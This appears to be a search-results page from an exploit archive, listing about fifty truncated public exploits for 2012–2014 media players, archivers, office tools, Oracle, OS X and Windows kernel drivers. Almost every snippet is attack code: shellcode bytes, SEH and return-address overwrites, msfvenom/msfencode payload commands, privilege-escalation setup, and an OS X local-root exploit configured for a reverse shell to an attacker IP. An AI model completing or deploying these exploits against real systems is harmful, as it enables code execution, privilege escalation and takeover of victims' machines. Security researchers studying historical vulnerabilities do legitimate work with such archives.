41207 matches found
ActFax-4.31---Local-System
Title: ActFax 4.31 Local Privilege Escalation Exploit Author: Craig Freyman @cd1zz Discovered: July 10, 2012 Vendor Notified: June 12, 2012 Description: http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html sc = "\x89\xe5\xdb\xce\xd9\x75\xf4\x58\x50\x59\x49\x49\x49\x49"...
CoolPlayer-Portable-2.19.2
Buffer overflow that bypasses ASLR by using a non-aslr module Tested against CoolPlayer Portable version 2.19.2 on Windows Vista Business 32 bit Written by Blake patched by pole Originally found by Securityxxxpert print "\n=====================================" print "CoolPlayer Portable Buffer...
Mini-stream-RM-MP3-Converter-3.1.2
Exploit Title: Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 local buffer overflow \w ASLR and DEP bypass Date: 26 July 2012 Exploit Author: Gianni Gnesa Vendor Homepage: http://mini-stream.net/ Software Link: http://mini-stream.net/rm-to-mp3-converter/download Version: 3.1.2.1.2010.03.30 from...
MyMp3-Player-Stack-.m3u-DEP
Title: MyMp3-Player '.m3u' Stack BOF Bypass DEP Author: Daniel Romero Perez @danielrome Software Version: MyMp3-Player 3.02.067 Tested on: Windows XP SP3 - ES Mail: [email protected] Blog: unlearningsecurity.blogspot.com import os import struct Buffer Buff = "\x41" 1024 ShellCode ruby...
BlazeVideo-HDTV-Player-6.6
Exploit Title: BlazeVideo HDTV Player 6.6 Professional Direct Retn Date: 11-25-2012 Exploit Author: Nezim @nezimlufni Vendor Homepage: http://www.blazevideo.com/ Version: BlazeVideo HDTV Player 6.6 Professional filename="video.PLF" junk = "http://"+"\x90"253 junk +="\x33\xBF\x96\x7C" junk +="\x90...
Aviosoft-Digital-TV-Player-1.x
Exploit Title: Aviosoft Digital TV Player Professional 1.x Direct Retn Date: 11-25-2012 Exploit Author: Nezim @nezimlufni Vendor Homepage: http://www.aviosoft.com/ Version: Aviosoft Digital TV Player Professional 1.x filename="video.PLF" junk = "http://"+"\x90"253 junk +="\x33\xBF\x96\x7C" junk...
FormatFactory-3.0.1-Profile
Exploit Title: FormatFactory v3.0.1 Profile File Handling Buffer Overflow Version: 3.0.1 Date: 2012-11-19 Author: Julien Ahrens @MrTuxracer Homepage: http://www.inshell.net from struct import pack file="profile.ini" junk1="\xCC" 260 nseh="\xeb\x06\x90\x90" eip=pack'L',0x024C1923 CALL DWORD PTR...
Zoner-Photo-Studio-15-Build-3
Exploit Title: Zoner Photo Studio v15 Build 3 Zps.exe Registry Value Parsing Local Buffer Overflow Version: 15 Build 3, Build 2 Date: 2012-11-09 Author: Julien Ahrens from struct import pack file="poc.reg" junk1="\xCC" 2136 nseh="\xeb\x06\x90\x90" eip=pack'L',0x0C7D8F13 JMP DWORD PTR SS:EBP-18 -...
Oracle-Database-Authentication
Oracle Database is prone to a remote security-bypass vulnerability that affects the authentication protocol. An attacker can exploit this issue to bypass the authentication process and gain unauthorized access to the database. This vulnerability affects Oracle Database 11g Release 1 and 11g Relea...
NCMedia-Sound-Editor-Pro-7.5.1-SEH-DEP
Exploit: NCMedia Sound Editor Pro v7.5.1 SEHDEP Author: b33f - http://www.fuzzysecurity.com/ OS: Windows 7 Pro SP1 probably universal across 32-bit POC - Julien Ahrens XP SP3 Software: http://www.soundeditorpro.com/ import sys, socket, struct file="MRUList201202.dat"...
NCMedia-Sound-Editor-Pro-7.5.1
Exploit Title: NCMedia Sound Editor Pro v7.5.1 MRUList201202.dat File Handling Local Buffer Overflow Version: 7.5.1 Date: 2012-08-07 Author: Julien Ahrens Website: http://www.inshell.net Software Link: http://www.soundeditorpro.com/ from struct import pack file="MRUList201202.dat" windows/exec...
FuzeZip-1.0.0.131625-SEH
Date: 16.Apr.2013 Vulnerability reported Exploit Author: Josep Pi Rodriguez, Pedro Guillen Nunez , Miguel Angel de Castro Simon Organization: RealPentesting Vendor Homepage: http://fuzezip.com/ Software Link: http://download.fuzezip.com/FuzeZipSetup.exe Version: 1.0.0.131625 header1 =...
WinArchiver-3.2-SEH
Exploit Title: Winarchiver V 3.2 SEH Overflow Date: April 24, 2013 Exploit Author: Josep Pi Rodriguez, Pedro Guillen Nunez , Miguel Angel de Castro Simon Organization: RealPentesting Vendor Homepage: http://winarchiver.com Software Link: http://www.winarchiver.com/WinArchiver3.exe zipheader =...
HexChat-2.9.4-Local-Exploit
HexChat 2.9.4 Local Exploit Bug found by Jules Carter @iMulitia Exploit by Matt "hostess" Andreko mandreko at accuvant.com http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html junk1 = "B"30 shellcode = msfvenom -p windows/messagebox EXITFUNC=process BufferRegister=ESP -e...
VirtualDJ-ProHome-7.3
Exploit Author: Alexandro Sánchez Bach functionmixer.blogspot.com Vendor Homepage: http://www.virtualdj.com/ Software Link: http://www.filehippo.com/en/downloadvirtualdj/14361/ Version: VirtualDJ Pro/Home 7.3 def encodeDatadecoder, data, validValues: assert data.find"\0" == -1, "Shellcode must be...
Photodex-ProShow-Producer-5.0.3297-.pxs
Exploit Title: Photodex ProShow Producer v5.0.3297 .pxs Memory Corruption Vulnerability Version: 5.0.3297 Date: 2013-02-14 Author: Julien Ahrens @MrTuxracer Homepage: http://www.inshell.net Software Link: http://www.photodex.com from struct import pack file="exploit.pxs" head =...
Inmatrix-Ltd.-Zoom-Player-8.5-.jpeg
Exploit Title: Inmatrix Ltd. Zoom Player Crafted JPEG File Memory Corruption and Arbitrary Code Execution Exploit. Version: Zoom Player v8.5 Date: 09-1-2013 Author: Debasish Mandal. Blog : http://www.debasish.in/ d =...
Mediacoder-(.lst)-SEH
Exploit Title: All Mediacoder Product SEH Buffer Overflow Download All Product: http://www.mediacoderhq.com/editions.html Vulnerable Product:! Mediacoder 0.8.22.5525 Mediacoder Web Video Edition 0.8.22 Mediacoder Handsets Edition 0.8.22 import os import sys from struct import pack from time impor...
Mediacoder-(.m3u)-SEH
Exploit Title: All Mediacoder Product SEH Buffer Overflow Download All Product: http://www.mediacoderhq.com/editions.html Vulnerable Product:! Mediacoder 0.8.22.5525 Mediacoder Web Video Edition 0.8.22 import os import sys from struct import pack from time import sleep if os.name == "nt":...
MediaCoder-PMP-Edition-0.8.17---(.m3u)
Exploit Title: MediaCoder PMP Edition 0.8.17 Buffer Overflow Exploit SEH Download link: http://www.mediacoderhq.com/device/mpx.htm Vulnerable Product: MediaCoder Personal Media Player Edition Date found: 21.06.2013 Date publish: 21.06.2013 from struct import pack junk = "http://" + "\x41" 765 nse...
aSc-Timetables-2013
The buffer overflow vulnerability resides in the Add subject functionality, and it's triggered when the user will submit a large string when specifying the school subject name. To trigger the vulnerability go to the main menu , select subjects , click new then generate a string with the code belo...
AudioCoder-0.8.22---(.m3u)-Direct-
Title: AudioCoder 0.8.22 - Direct Retn Buffer OverFlow version: 0.8.22 build 5506 built on May 27 2013, 00:22:49 link: http://www.downloadbestsoft-mirror2.com/programs/AudioCoder-0.8.22.5506.exe Platform: Windows XP sp3 Date: June 21th, 2013 header = "http://" junk = "\x41" 249 junk+=...
Adrenalin-Player-2.2.5.3-(.asx)-
Title: Adrenalin Player .asx - SEH Buffer Overflow software: Adrenalin Player version : 2.2.5.3 Platform: Windows XP sp3 Date: June 18th, 2013 header=" " junk= "\x90" 2079 junk+="\xeb\x06\x90\x90" jmp short junk+="\x13\xf3\x16\x10" POP POP RETN AdrenalinX.dll junk+="\x90" 16 NOP padding before...
Adrenalin-Player-2.2.5.3-(.wax)-SEH
Title: Adrenalin Player SEH Buffer Overflow software: Adrenalin Player version : 2.2.5.3 Platform: Windows XP sp3 Date: June 16th, 2013 Author: onying @onyiing junk= "\x90" 2140 junk+="\xeb\x06\x90\x90" jmp short junk+="\x13\xf3\x16\x10" POP POP RETN junk+="\x90" 16 NOP padding before shellcode...
Winamp-5.1x-(.m3u)
Stack-based buffer overflow in Nullsoft Winamp 5.12 and 5.13 allows user-assisted attackers to cause a denial of service crash and possibly execute arbitrary code via a crafted .m3u file that causes an incorrect strncpy function call when the player pauses or stops the file. import struct header ...
BOINC-Manager-7.0.64
BOINC is a program that lets you donate your idle computer time to science projects like SETI@home, Climateprediction.net, Rosetta@home, World Community Grid, and many others. In order to exploit the vulnerability the attacker must convince the victim to use the very long URL as Account Manager...
Ophcrack-3.5.0---Local-Code
Exploit Author: xisone@STM Solutions Vendor Homepage: http://ophcrack.sourceforge.net/ Software Link: http://downloads.sourceforge.net/ophcrack/ophcrack-win32-installer-3.5.0.exe Version: 3.5.0 shellcode = windows/exec EXITFUNC=seh CMD=calc R | msfencode -e x86/alphamixed bufferregister=esp -t c...
Kloxo-6.1.6---Local-Privilege
Date: August 2012 or so Exploit Author: HTP Vendor Homepage: http://lxcenter.org/ Software Link: download link if available Version: 6.1.6 Latest LXLABS=cat /etc/passwd | grep lxlabs | cut -d: -f3 export MUID=$LXLABS export GID=$LXLABS export TARGET=/bin/sh export CHECKGID=0 export NONRESIDENT=1...
No-IP-Dynamic-Update-Client-
This exploit covers a stack-based overflow present in -i parameter, IPaddress variable name in source code. It is probably the most basic parameter, as this is the way to say the client that our IP has changed import os binary = "./noip-2.1.9-1/binaries/noip2-i686" shellcode =...
Adrenalin-Player-2.2-(.m3u)
Exploit Title: Adrenalin Player 2.2.5.3 Buffer Overflow ExploitSEH http://software.naver.com/software/summary.nhn?softwareId=MFS100099 Author: seaofglass [email protected] Version : 2.2.5.3 my $file = "adrenalin.m3u"; my $junk = "\x90" x 2172; my $nseh = pack'V', 0x909006EB; my $seh = pack'V',...
ABBS-Audio-Media-Player-3.1-(.lst)
Exploit Title: ABBS Audio Media Player v3.1 .lst Buffer Overflow Version: v3.1 Date: 2013-05-04 from struct import pack file="exploit.lst" windows/exec CMD=calc.exe Encoder: x86/shikataganai powered by Metasploit msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d' shellcode =...
WinAmp-5.63-(winamp.ini)
I tried an alpha3 encoded egghunter but could not fit it in a single buffer and unfortunately it did not work, it wrote an invalid address on the stack then tried to access it If you can make it work or find a solution for ASLR/DEP please contact me So I wrote from scratch a venetian shellcode th...
Easy-LAN-Folder-Share-3.2.0-SEH
The registration code field in the 'activate license' window is vulnerable to a buffer overflow. This script generates a malicious registry file. Once the generated file has been loaded into the registry, execute the application as normal. header = "Windows Registry Editor Version 5.00\n\n" heade...
Novell-Client-2-SP3---Privilege-Escalation
The first public information I have seen about this bug was from Nikita Tarakanov @NTarakanov I am not sure weather there was anything else public Exploit for DEMO purposes : Does not bypass SMEP on Windows 8 from ctypes import import sys,struct,os from optparse import OptionParser kernel32 =...
Symantec-Workspace-Virtualization-6.4.1895.0
Symantec Workspace Virtualization 6.4.1895.0 Local Kernel Mode Privilege Escalation Exploit Date: 2013-7-17 Author : MJ0011 Version: Symantec Workspace Virtualization 6.4.1895.0 include "stdafx.h" include "windows.h" typedef struct UNICODESTRING USHORT Length; USHORT MaximumLength; PWSTR Buffer;...
BlazeDVD-Pro-player-6.1-Stack-Based-Buffer
BlazeDVD Pro player 6.1 Local stack based buffer overflow Author: PuN1sh3r Email: [email protected] Date: Mon Jul 15 03:01:37 EDT 2013 Vendor link: http://www.blazevideo.com/download.htmm Software Link: http://www.blazevideo.com/download.php?product=BlazeDVDPro App Version: 6.1 $file =...
Adobe-Reader-X-10.1.4.38
Product: Adobe Reader X Version: 10.x Product Homepage: adobe.com Binary affected: AcroForm.api Binary Version: 10.1.4.38 from hashlib import md5 import sys, struct Begin of the miniPDF import zlib For constructing a minimal pdf file PDF REference 3rd edition:: 3.2 Objects class PDFObject: def...
Static-HTTP-Server-1.0-SEH
Notes: Multiple HTTP commands and headers are vulnerable to overflows and trigger an exception, but I was unable to control the SEH handler with anyting but configuration options in the http.ini. import os def fileCreate: print "\n Your current file directory is %s. " % os.getcwd try: File =...
Adrenalin-Player-2.2.5.3-.wvx-SEH
Exploit Title:Adrenalin Player 2.2.5.3 .wvx SEH-Buffer Overflow Date:7/1/2013 Exploit Author:MrXors Vendor HomePage:http://software.naver.com/software/summary.nhn?softwareId=MFS100099 Software Link:http://software.naver.com/software/summary.nhn?softwareId=MFS100099 Version App:2.2.5.3...
AudioCoder-0.8.22-(.lst)-RTN
Title: AudioCoder 0.8.22 .lst - Direct Retn Buffer OverFlow version: 0.8.22 build 5506 built on May 27 2013, 00:22:49 link: http://www.downloadbestsoft-mirror2.com/programs/AudioCoder-0.8.22.5506.exe Platform: Windows XP sp3 Date: June 23th, 2013 Author: onying @onyiing header = "http://" junk =...
OSX-10.8.4-Local-Root-
Exploit Title: OSX 10.8.4 Local Root Priv Escalation Root Reverse Shell Date: 08-27-2013 Exploit Author: David Kennedy TrustedSec Website: https://www.trustedsec.com Tested On: OSX 10.8.4 import subprocess IPADDR for REVERSE SHELL - change this to your attacker IP address ipaddr = "192.168.1.1"...
Beetel-Connection-Manager
Exploit Title:Beetel Connection Manager SEH Buffer Overflow Software for usb wireless Homepage:http://www.beetel.in/business-solutions/international-business/3g-products/g31-3g-data-card Version:PCWBTLINDV1.0.0B04 Software...
Internet-Haut-Debit-Mobile
Exploit Title:Internet Haut Debit Mobile Buffer Overflow SEH Software Link:https://app.box.com/s/4h9cm20hp5iiask8rwrm Poc video demo :http://www.youtube.com/watch?v=sAHfjmNHiow Version:PCWMATMARV1.0.0B03 Date found: 10.10.2013 Date published:10.10.2013 from struct import pack file="NetConfig.ini"...
CCProxy-7.3-Integer-Overflow
Exploit Title: CCProxy v7.3 Integer Overflow Exploit Date: 2013/03/22 Author: Mr.XHat E-Mail: Mr.XHat GMail.com Vendor Homepage: http://www.youngzsoft.net/ Software Link: http://user.youngzsoft.com/ccproxy/update/ccproxysetup.exe Version: Prior To 7.3 hdr = "System" hdr += "\x0d\x0a" hdr +=...
PotPlayer-1.5.42509-Beta
Exploit Title:PotPlayer 1.5.42509 Beta - DOSInteger Division by Zero Author: sajith version: PotPlayer 1.5.42509 Beta Vendor Homepage: http://daumpotplayer.com/ Tested in: Windows XP SP3 rawinput"Hit Enter to create a malicious file" f = open"victim.wav","w"...
VUPlayer-2.49-(.M3U)-DEP-Bypass
VUPlayer 2.49 .M3U ExploitUniversal buffer overflow/DEP bypass Download: http://vuplayer.com/ Tested on Wind0ws XP SP3 DEP:OptOut import struct p = open"ExploitVirtualProtect.m3u", "w" crash = "\x41" 1012 sc = "\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49"...
Windows-NDPROXY-SYSTEM
Original crash ... null pointer dereference Access violation - code c0000005 !!! second chance !!! 00000038 ?? ??? NDPROXY Local SYSTEM privilege escalation from ctypes import from ctypes.wintypes import import os, sys kernel32 = windll.kernel32 ntdll = windll.ntdll GENERICREAD = 0x80000000...
Kingsoft-Office-Writer-8.1.0.3385
Author: Julien Ahrens @MrTuxracer Homepage: http://www.rcesecurity.com Software Link: http://www.kingsoftstore.com Tested on: WinXP-GER, Win7-GER, Win8-EN from struct import pack file="exploit.wps" head="\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1\x00\x00\x00\x00\x00\x00\x00\x00"+...
Calavera-UpLoader-3.5-SEH
exploit por Daniel - La Calavera Email: [email protected] Para CracksLatinoS rell = "\x41" 477 rell1 = "\x42" 4000 head = "\x41" 8 head += "\x0d\x0a\x31\x0d\x0a" head1 = "\x0d\x0a" head2 = "170.1.1.0" head2 +="\x0d\x0a" head2 +="\x22" head2 +=...
ALLPlayer-5.8.1-(.m3u)-
Exploit Title: ALLPlayer 5.8.1 - .m3u Buffer Overflow SEH Date: Mar 1 2014 Exploit Author: Gabor Seljan Software Link: http://www.allplayer.org/download/allplayer Version: 5.8.1 use strict; use warnings; my $filename = "sploit.m3u"; my $junk1 = "\x41" x 301; Offset to SEH my $nSEH = "\x61\x50";...